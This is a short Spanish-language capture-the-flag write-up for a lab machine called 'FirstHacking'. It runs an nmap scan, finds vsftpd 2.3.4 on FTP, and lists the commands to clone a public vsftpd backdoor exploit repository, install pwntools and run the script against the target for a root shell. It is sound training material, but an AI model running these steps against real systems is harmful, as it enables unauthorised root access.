> For the complete documentation index, see [llms.txt](https://shinki-organization.gitbook.io/dw/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://shinki-organization.gitbook.io/dw/write-ups/quickstart/maquinas-muy-faciles/firsthacking-write-up.md).

# FirstHacking write-up

## **Verificamos si tenemos conexión con la máquina víctima**

<figure><img src="/files/fDVdMiAlKUWix8g58v0K" alt=""><figcaption></figcaption></figure>

## **Escaneo de puertos abiertos**

Usaremos la herramienta **Nmap** para ver los puertos abiertos de la máquina víctima con el siguiente comando:

```bash
sudo nmap -p- -sCVS --min-rate=5000 -vvv -Pn -n 172.19.0.2
```

<figure><img src="/files/3F70WK28xpvEuq2tk731" alt=""><figcaption></figcaption></figure>

Esto nos indica que tiene el puerto 21 (FTP) abierto, ahora lo que hay que notar es que la versión del servicio (vsftpd 2.3.4) es vulnerable.

## **Explotación de la vulnerabilidad**

Entonces lo que vamos a hacer es usar el siguiente payload de este repositorio de git hub (<https://github.com/Hellsender01/vsftpd\\_2.3.4\\_Exploit.git>) para obtener una rever shell.

Para hacer esto clonamos primero el repositorio en nuestra máquina con el siguiente comando:

```bash
git clone https://github.com/Hellsender01/vsftpd_2.3.4_Exploit.git 
```

Nos instalamos con pip la librería de python llamada `pwntools` .

```bash
pip install pwntools
```

Y dentro de la nueva carpeta le damos permisos a exploit.py.

```bash
chmod 0777 exploit.py  
```

Y ya por ultimo ejecutamos el exploit.py indicando la IP de la máquina víctima.

```bash
python3 exploit.py Target_IP
```

<figure><img src="/files/3UUEqoyuRVuiyMfxCfkc" alt=""><figcaption></figcaption></figure>

Esto nos otorgará privilegios root, completando así la explotación de la máquina.

<figure><img src="/files/zQPiKVNsYIjkh02nJx7D" alt=""><figcaption></figcaption></figure>
